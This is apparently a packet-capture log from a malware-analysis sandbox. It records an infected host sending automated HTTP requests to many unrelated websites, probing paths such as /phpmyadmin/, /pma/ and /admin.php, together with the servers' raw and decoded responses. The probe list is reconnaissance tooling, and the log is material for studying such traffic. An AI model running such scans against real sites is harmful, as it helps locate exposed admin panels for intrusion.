Feb 21, 2024 00:26:11.300718069 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471571.2231478034088127903 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLqMQhUjPXFZZ6QMfhZ0ZUmYa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalheeXEm7zbEGbN14cgagj0+7/2E86QVq9BnsHvbzLGWiOjw033DwPcQNea77hySx/w==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,alGcl2prlCF8HwMfrZ9rYKH+o92Cjgvs4rLz3S3oAKE=,/j+AjfLiOiE0Vc9NsP8sK7gAAzzliq9iePftiHVq5jlJpdGUXXdihYUPcFwLcUQYLPdrIc1H06/OFwdhz0Sadw== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 96 93 c2 4e 26 05 e8 b2 0c cd cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 31 e7 8c 71 7e 79 74 94 1d 97 b6 08 eb 06 58 15 6a 7d 89 67 ce 8f 18 7e e8 36 23 1a 33 0b 2e 9b 26 8f 96 6a 75 ed 9c 75 bf cb 05 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 36 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 51 46 05 25 35 f7 85 d4 90 a7 27 ac 96 2b 55 b7 f5 7f 84 d6 83 eb 4e 72 86 2f 8c 45 7d 1b 45 45 25 9d 07 14 dc 86 39 9f ee 5c 54 21 34 1c be b6 ea 3e 8f fe e2 1f df f3 2b 5b 37 32 28 94 b0 63 ce cd 75 0e e5 02 7a be a0 82 06 02 39 53 a6 cc a3 b8 41 78 5f 3a 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 31 dc 12 7c e1 54 13 94 35 3b 2a 76 6c 3a c0 2b 7b 5c ce ce 6c f0 3b 72 8d 45 2b 61 75 c2 8c 9d 5b ad ed b2 67 d9 06 94 42 97 69 65 ee 18 05 35 8f 54 8d 70 44 63 16 11 ab 1c cc f3 48 88 e5 72 99 60 2c 93 c2 d6 62 2e 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 27 bc 17 bd 91 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 b5 98 63 2e 78 f1 01 f4 3d 20 8f ec ce bf ca 02 39 3c e2 eb 55 87 b5 06 5f 01 60 ea f4 d6 07 58 05 d1 3d 10 9d db 77 60 f6 96 ec f1 3d d7 34 74 00 6f da 99 56 85 48 93 49 7a 9e 8c 84 ef d4 0b a0 1c 47 a3 31 c9 07 52 67 e2 43 fd 99 e8 33 3f 9b d9 72 cd b4 34 8b 3c 02 8c 3f Data Ascii: 443Vo6_E-N&0l((Z:[L(R%F}w9ql7c1q~ytXj}g~6#3.&juuM%jYC+X60XP%xw8QF%5'+UNr/E}EE%9\T!4>+[72(cuz9SAx_:baI81\|T5;*vl:+{\l;rE+au[gBie5TpDcHr`,b.1$$1:\|+'HN(E+9^c.x= 9<U_`X=w`=4toVHIzG1RgC3?r4<?
Feb 21, 2024 00:26:11.300724983 CET	628	IN	Data Raw: a6 11 25 bd c3 d0 80 cb a3 6d bd 5c 6d 89 4c 7a d6 a9 a0 32 ba 0a 4e 63 70 b5 f4 1e f9 b7 8a a9 de 7a 59 fd cd b7 d8 03 8a 2d a5 5b f3 99 2c ee 16 ce b6 a6 8c 2f 98 f2 7f 6e 2e 7e de d2 bf a3 ad e4 a9 4f 6a ce 74 60 37 d7 ec fc 33 52 fa 2c 65 de Data Ascii: %m\mLz2NcpzY-[,/n.~Ojt`73R,e;+Uq6V&EdDUvA6wA4-5?%O`J5u"({A71NFYykkjn='OMWpOJfkKM xuP[[uS

Session ID	Source IP	Source Port	Destination IP	Destination Port
237	192.168.2.6	59581	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.196707010 CET	174	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.361815929 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
238	192.168.2.6	59633	45.136.114.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.196994066 CET	175	OUT	GET /admin.php HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.304064035 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
239	192.168.2.6	59613	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.240324020 CET	174	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.399198055 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
240	192.168.2.6	59624	213.186.33.4	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.244497061 CET	176	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: art-paix-di.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.408395052 CET	432	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:11 GMT content-type: text/html; charset=iso-8859-1 content-length: 196 server: Apache x-iplb-request-id: BF60E3DE:E8E8_D5BA2104:0050_65D53513_D6AD:19A2 x-iplb-instance: 51886 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
241	192.168.2.6	59614	81.169.145.143	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.261780024 CET	175	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: d-brinkmann.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.445935965 CET	355	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache/2.4.58 (Unix) Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
242	192.168.2.6	59643	45.147.96.4	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.271570921 CET	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.444813967 CET	409	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://glazing-bt.com/phpmyadmin/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
243	192.168.2.6	58692	59.106.13.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.283957958 CET	175	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.566591024 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
244	192.168.2.6	59712	162.0.235.125	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.332776070 CET	182	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.495814085 CET	1047	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 795 date: Tue, 20 Feb 2024 23:26:11 GMT server: LiteSpeed location: https://norwegischlernen.info/phpMyAdmin/ x-turbo-charged-by: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
245	192.168.2.6	59938	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.394972086 CET	166	OUT	GET /pma/ HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.514823914 CET	271	IN	HTTP/1.1 301 Moved Permanently Age: 0 Date: Tue, 20 Feb 2024 23:26:11 GMT Location: https://www.mwpmedia.com/pma/ Server: Squarespace Set-Cookie: crumb=BbjKBhdfe6wFMjAwY2FkNGQzYzE4NzAyZjEzZmViMzYxZjg0MGZj;Path=/ X-Contextid: leelh1O6/Mic42ujc Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
246	192.168.2.6	58954	217.160.0.179	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.435647011 CET	170	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: upblue.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.708013058 CET	567	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 91 4f 4f 84 30 10 c5 ef 26 7e 87 b1 89 47 18 c8 7a 30 4a 49 74 ff 44 93 5d dd 18 36 ea 91 a5 5d 21 02 ad a5 88 f8 e9 a5 dd 12 b9 98 c8 a5 65 f2 66 e6 f7 5e a3 b3 c5 e3 3c 79 dd 2e 21 d7 55 09 db dd ed fa 7e 0e c4 43 7c 9e cd 11 17 c9 02 5e ee 92 cd 1a 42 3f 80 95 4a 2b de 70 8d b8 7c 20 40 72 ad e5 15 62 d7 75 7e 37 f3 85 7a c3 e4 09 bf cc 9c d0 34 ba ab 77 70 5d 3e d3 8c c4 a7 27 91 51 d8 93 a7 cc 9c ba d0 25 8f 5b 09 fb b2 e5 11 1e 7f 87 7a c5 75 0a f5 b0 92 92 77 de 77 42 b1 86 40 26 6a cd 6b 4d 09 01 34 cd 13 11 e3 4d a6 0a a9 0b 51 ff a1 33 c4 1e ff 68 8b 4f 4a dc 20 4f f7 92 4f e4 9a 7f 69 34 84 d7 90 e5 a9 1a dc d2 5d b2 f2 2e dd 3a cc 1d f4 e8 0a 94 e8 1a 4a c2 20 38 b7 e6 6c 1d 1a 95 51 9b 4f 33 04 d4 4a 63 cc bf 28 8b 2a f5 19 47 dc e6 72 d3 df b0 aa a8 91 80 b5 4b 89 b3 4f c0 0e d8 0f 66 b9 a2 24 20 50 0b c5 9b e2 7b 08 61 bc 11 6b bc 16 47 04 13 c2 5e b0 de 26 1a fe c6 98 87 a6 22 e3 28 85 5c f1 c3 3f 71 62 f7 a8 8e 79 a0 9d c0 46 98 c6 60 be 08 a5 19 8e e3 5e 9c c2 e0 18 8d 95 d8 c7 fe 01 ce 79 21 1f 66 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 166OO0&~Gz0JItD]6]!ef^<y.!U~C\|^B?J+p\| @rbu~7z4wp]>'Q%[zuwwB@&jkM4MQ3hOJ OOi4].:J 8lQO3Jc(*GrKOf$ P{akG^&"(\?qbyF`^y!f0

Session ID	Source IP	Source Port	Destination IP	Destination Port
247	192.168.2.6	59906	78.47.2.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.468746901 CET	181	OUT	GET /admin.php HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.650274038 CET	212	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
248	192.168.2.6	59990	45.136.114.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.499473095 CET	177	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.607266903 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
249	192.168.2.6	60035	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.508173943 CET	168	OUT	GET /pma/ HTTP/1.1 Host: publichouse.ie Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:11.623558998 CET	273	IN	HTTP/1.1 301 Moved Permanently Age: 0 Date: Tue, 20 Feb 2024 23:26:11 GMT Location: https://www.publichouse.ie/pma/ Server: Squarespace Set-Cookie: crumb=BcnZnjxfdDI3Y2I4YzZlNjNmMTZjOTA0N2EwOWQxNWI4NDYyNDQ1;Path=/ X-Contextid: SdDR1PHk/1pEeIUVN Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
250	192.168.2.6	59046	223.29.45.10	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:11.627568007 CET	187	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.shinko-kensetsu.eei.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
